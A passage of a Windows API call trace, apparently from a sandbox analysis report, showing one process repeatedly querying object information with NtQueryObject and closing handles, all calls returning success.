Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.511] CloseHandle (hObject=0x1cc) returned 1 [0043.511] CloseHandle (hObject=0x1c8) returned 1 [0043.511] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.511] CloseHandle (hObject=0x1cc) returned 1 [0043.511] CloseHandle (hObject=0x1c8) returned 1 [0043.511] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.511] CloseHandle (hObject=0x1cc) returned 1 [0043.511] CloseHandle (hObject=0x1c8) returned 1 [0043.511] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.511] CloseHandle (hObject=0x1cc) returned 1 [0043.511] CloseHandle (hObject=0x1c8) returned 1 [0043.511] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.512] CloseHandle (hObject=0x1cc) returned 1 [0043.512] CloseHandle (hObject=0x1c8) returned 1 [0043.512] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.512] CloseHandle (hObject=0x1cc) returned 1 [0043.512] CloseHandle (hObject=0x1c8) returned 1 [0043.512] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.512] CloseHandle (hObject=0x1cc) returned 1 [0043.512] CloseHandle (hObject=0x1c8) returned 1 [0043.512] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.512] CloseHandle (hObject=0x1cc) returned 1 [0043.512] CloseHandle (hObject=0x1c8) returned 1 [0043.512] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.512] CloseHandle (hObject=0x1cc) returned 1 [0043.512] CloseHandle (hObject=0x1c8) returned 1 [0043.512] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.512] CloseHandle (hObject=0x1cc) returned 1 [0043.512] CloseHandle (hObject=0x1c8) returned 1 [0043.512] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.512] CloseHandle (hObject=0x1cc) returned 1 [0043.512] CloseHandle (hObject=0x1c8) returned 1 [0043.512] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.513] CloseHandle (hObject=0x1cc) returned 1 [0043.513] CloseHandle (hObject=0x1c8) returned 1 [0043.513] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.513] CloseHandle (hObject=0x1cc) returned 1 [0043.513] CloseHandle (hObject=0x1c8) returned 1 [0043.513] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.513] CloseHandle (hObject=0x1cc) returned 1 [0043.513] CloseHandle (hObject=0x1c8) returned 1 [0043.513] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.513] CloseHandle (hObject=0x1cc) returned 1 [0043.513] CloseHandle (hObject=0x1c8) returned 1 [0043.513] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.513] CloseHandle (hObject=0x1cc) returned 1 [0043.513] CloseHandle (hObject=0x1c8) returned 1 [0043.513] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.513] CloseHandle (hObject=0x1cc) returned 1 [0043.513] CloseHandle (hObject=0x1c8) returned 1 [0043.513] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.513] CloseHandle (hObject=0x1cc) returned 1 [0043.513] CloseHandle (hObject=0x1c8) returned 1 [0043.513] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.514] CloseHandle (hObject=0x1cc) returned 1 [0043.514] CloseHandle (hObject=0x1c8) returned 1 [0043.514] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.514] CloseHandle (hObject=0x1cc) returned 1 [0043.514] CloseHandle (hObject=0x1c8) returned 1 [0043.514] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.514] CloseHandle (hObject=0x1cc) returned 1 [0043.514] CloseHandle (hObject=0x1c8) returned 1 [0043.514] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.514] CloseHandle (hObject=0x1cc) returned 1 [0043.514] CloseHandle (hObject=0x1c8) returned 1 [0043.514] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.514] CloseHandle (hObject=0x1cc) returned 1 [0043.514] CloseHandle (hObject=0x1c8) returned 1 [0043.514] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.514] CloseHandle (hObject=0x1cc) returned 1 [0043.514] CloseHandle (hObject=0x1c8) returned 1 [0043.514] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.514] CloseHandle (hObject=0x1cc) returned 1 [0043.514] CloseHandle (hObject=0x1c8) returned 1 [0043.515] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.515] CloseHandle (hObject=0x1cc) returned 1 [0043.515] CloseHandle (hObject=0x1c8) returned 1 [0043.515] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.515] CloseHandle (hObject=0x1cc) returned 1 [0043.515] CloseHandle (hObject=0x1c8) returned 1 [0043.515] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.515] CloseHandle (hObject=0x1cc) returned 1 [0043.515] CloseHandle (hObject=0x1c8) returned 1 [0043.515] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.515] CloseHandle (hObject=0x1cc) returned 1 [0043.515] CloseHandle (hObject=0x1c8) returned 1 [0043.515] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.515] CloseHandle (hObject=0x1cc) returned 1 [0043.515] CloseHandle (hObject=0x1c8) returned 1 [0043.515] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.515] CloseHandle (hObject=0x1cc) returned 1 [0043.515] CloseHandle (hObject=0x1c8) returned 1 [0043.516] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.516] CloseHandle (hObject=0x1cc) returned 1 [0043.516] CloseHandle (hObject=0x1c8) returned 1 [0043.516] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.516] CloseHandle (hObject=0x1cc) returned 1 [0043.516] CloseHandle (hObject=0x1c8) returned 1 [0043.516] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.516] CloseHandle (hObject=0x1cc) returned 1 [0043.516] CloseHandle (hObject=0x1c8) returned 1 [0043.516] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.516] CloseHandle (hObject=0x1cc) returned 1 [0043.516] CloseHandle (hObject=0x1c8) returned 1 [0043.516] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.516] CloseHandle (hObject=0x1cc) returned 1 [0043.516] CloseHandle (hObject=0x1c8) returned 1 [0043.516] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.516] CloseHandle (hObject=0x1cc) returned 1 [0043.516] CloseHandle (hObject=0x1c8) returned 1 [0043.516] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.516] CloseHandle (hObject=0x1cc) returned 1 [0043.516] CloseHandle (hObject=0x1c8) returned 1 [0043.517] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.517] CloseHandle (hObject=0x1cc) returned 1 [0043.517] CloseHandle (hObject=0x1c8) returned 1 [0043.517] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.517] CloseHandle (hObject=0x1cc) returned 1 [0043.517] CloseHandle (hObject=0x1c8) returned 1 [0043.517] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.517] CloseHandle (hObject=0x1cc) returned 1 [0043.517] CloseHandle (hObject=0x1c8) returned 1 [0043.517] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.517] CloseHandle (hObject=0x1cc) returned 1 [0043.517] CloseHandle (hObject=0x1c8) returned 1 [0043.517] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.517] CloseHandle (hObject=0x1cc) returned 1 [0043.517] CloseHandle (hObject=0x1c8) returned 1 [0043.517] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.517] CloseHandle (hObject=0x1cc) returned 1 [0043.517] CloseHandle (hObject=0x1c8) returned 1 [0043.517] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.517] CloseHandle (hObject=0x1cc) returned 1 [0043.518] CloseHandle (hObject=0x1c8) returned 1 [0043.518] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.518] CloseHandle (hObject=0x1cc) returned 1 [0043.518] CloseHandle (hObject=0x1c8) returned 1 [0043.518] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.518] CloseHandle (hObject=0x1cc) returned 1 [0043.518] CloseHandle (hObject=0x1c8) returned 1 [0043.518] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.518] CloseHandle (hObject=0x1cc) returned 1 [0043.518] CloseHandle (hObject=0x1c8) returned 1 [0043.518] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.518] CloseHandle (hObject=0x1cc) returned 1 [0043.518] CloseHandle (hObject=0x1c8) returned 1 [0043.518] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.518] CloseHandle (hObject=0x1cc) returned 1 [0043.518] CloseHandle (hObject=0x1c8) returned 1 [0043.518] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.518] CloseHandle (hObject=0x1cc) returned 1 [0043.518] CloseHandle (hObject=0x1c8) returned 1 [0043.519] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.519] CloseHandle (hObject=0x1cc) returned 1 [0043.519] CloseHandle (hObject=0x1c8) returned 1 [0043.519] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.519] CloseHandle (hObject=0x1cc) returned 1 [0043.519] CloseHandle (hObject=0x1c8) returned 1 [0043.519] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.519] CloseHandle (hObject=0x1cc) returned 1 [0043.519] CloseHandle (hObject=0x1c8) returned 1 [0043.519] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.519] CloseHandle (hObject=0x1cc) returned 1 [0043.519] CloseHandle (hObject=0x1c8) returned 1 [0043.519] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.519] CloseHandle (hObject=0x1cc) returned 1 [0043.519] CloseHandle (hObject=0x1c8) returned 1 [0043.519] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.519] CloseHandle (hObject=0x1cc) returned 1 [0043.519] CloseHandle (hObject=0x1c8) returned 1 [0043.519] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.519] CloseHandle (hObject=0x1cc) returned 1 [0043.520] CloseHandle (hObject=0x1c8) returned 1 [0043.520] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.520] CloseHandle (hObject=0x1cc) returned 1 [0043.520] CloseHandle (hObject=0x1c8) returned 1 [0043.520] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.520] CloseHandle (hObject=0x1cc) returned 1 [0043.520] CloseHandle (hObject=0x1c8) returned 1 [0043.520] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.520] CloseHandle (hObject=0x1cc) returned 1 [0043.520] CloseHandle (hObject=0x1c8) returned 1 [0043.520] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.520] CloseHandle (hObject=0x1cc) returned 1 [0043.520] CloseHandle (hObject=0x1c8) returned 1 [0043.520] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.520] CloseHandle (hObject=0x1cc) returned 1 [0043.520] CloseHandle (hObject=0x1c8) returned 1 [0043.520] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.520] CloseHandle (hObject=0x1cc) returned 1 [0043.520] CloseHandle (hObject=0x1c8) returned 1 [0043.521] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.521] CloseHandle (hObject=0x1cc) returned 1 [0043.521] CloseHandle (hObject=0x1c8) returned 1 [0043.521] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.521] CloseHandle (hObject=0x1cc) returned 1 [0043.521] CloseHandle (hObject=0x1c8) returned 1 [0043.521] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.521] CloseHandle (hObject=0x1cc) returned 1 [0043.521] CloseHandle (hObject=0x1c8) returned 1 [0043.521] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.521] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.521] CloseHandle (hObject=0x1cc) returned 1 [0043.521] CloseHandle (hObject=0x1c8) returned 1 [0043.521] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.521] CloseHandle (hObject=0x1cc) returned 1 [0043.521] CloseHandle (hObject=0x1c8) returned 1 [0043.521] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.521] CloseHandle (hObject=0x1cc) returned 1 [0043.521] CloseHandle (hObject=0x1c8) returned 1 [0043.521] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.521] CloseHandle (hObject=0x1cc) returned 1 [0043.522] CloseHandle (hObject=0x1c8) returned 1 [0043.522] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.522] CloseHandle (hObject=0x1cc) returned 1 [0043.522] CloseHandle (hObject=0x1c8) returned 1 [0043.522] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.522] CloseHandle (hObject=0x1cc) returned 1 [0043.522] CloseHandle (hObject=0x1c8) returned 1 [0043.522] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.522] CloseHandle (hObject=0x1cc) returned 1 [0043.522] CloseHandle (hObject=0x1c8) returned 1 [0043.522] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.522] CloseHandle (hObject=0x1cc) returned 1 [0043.522] CloseHandle (hObject=0x1c8) returned 1 [0043.522] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.522] CloseHandle (hObject=0x1cc) returned 1 [0043.522] CloseHandle (hObject=0x1c8) returned 1 [0043.522] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.522] CloseHandle (hObject=0x1cc) returned 1 [0043.522] CloseHandle (hObject=0x1c8) returned 1 [0043.522] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.523] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.523] CloseHandle (hObject=0x1cc) returned 1 [0043.523] CloseHandle (hObject=0x1c8) returned 1 [0043.523] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.523] CloseHandle (hObject=0x1cc) returned 1 [0043.523] CloseHandle (hObject=0x1c8) returned 1 [0043.523] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.523] CloseHandle (hObject=0x1cc) returned 1 [0043.523] CloseHandle (hObject=0x1c8) returned 1 [0043.523] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.523] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.523] CloseHandle (hObject=0x1cc) returned 1 [0043.523] CloseHandle (hObject=0x1c8) returned 1 [0043.523] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.523] CloseHandle (hObject=0x1cc) returned 1 [0043.523] CloseHandle (hObject=0x1c8) returned 1 [0043.523] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.523] CloseHandle (hObject=0x1cc) returned 